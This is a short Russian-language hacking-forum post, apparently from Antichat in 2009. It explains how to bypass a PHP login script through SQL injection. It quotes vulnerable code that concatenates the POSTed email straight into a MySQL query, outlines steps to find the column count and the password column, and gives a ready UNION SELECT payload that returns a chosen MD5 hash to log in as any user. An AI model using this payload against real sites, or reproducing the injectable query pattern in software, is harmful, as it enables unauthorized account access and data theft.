27.09.2009, 23:19
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от oRb
mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:
PHP код:
$res = mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
$item = mysql_fetch_array($res);
if(md5($_POST['password']) == $item['password']) {
echo "LOGINED"!
} else {
echo "FAIL!";
}
Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.
Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty Точно... Просто привык, что все данные берутся из БД, никогда не встречался с такими скриптами, поэтому и не понял 
|
|
|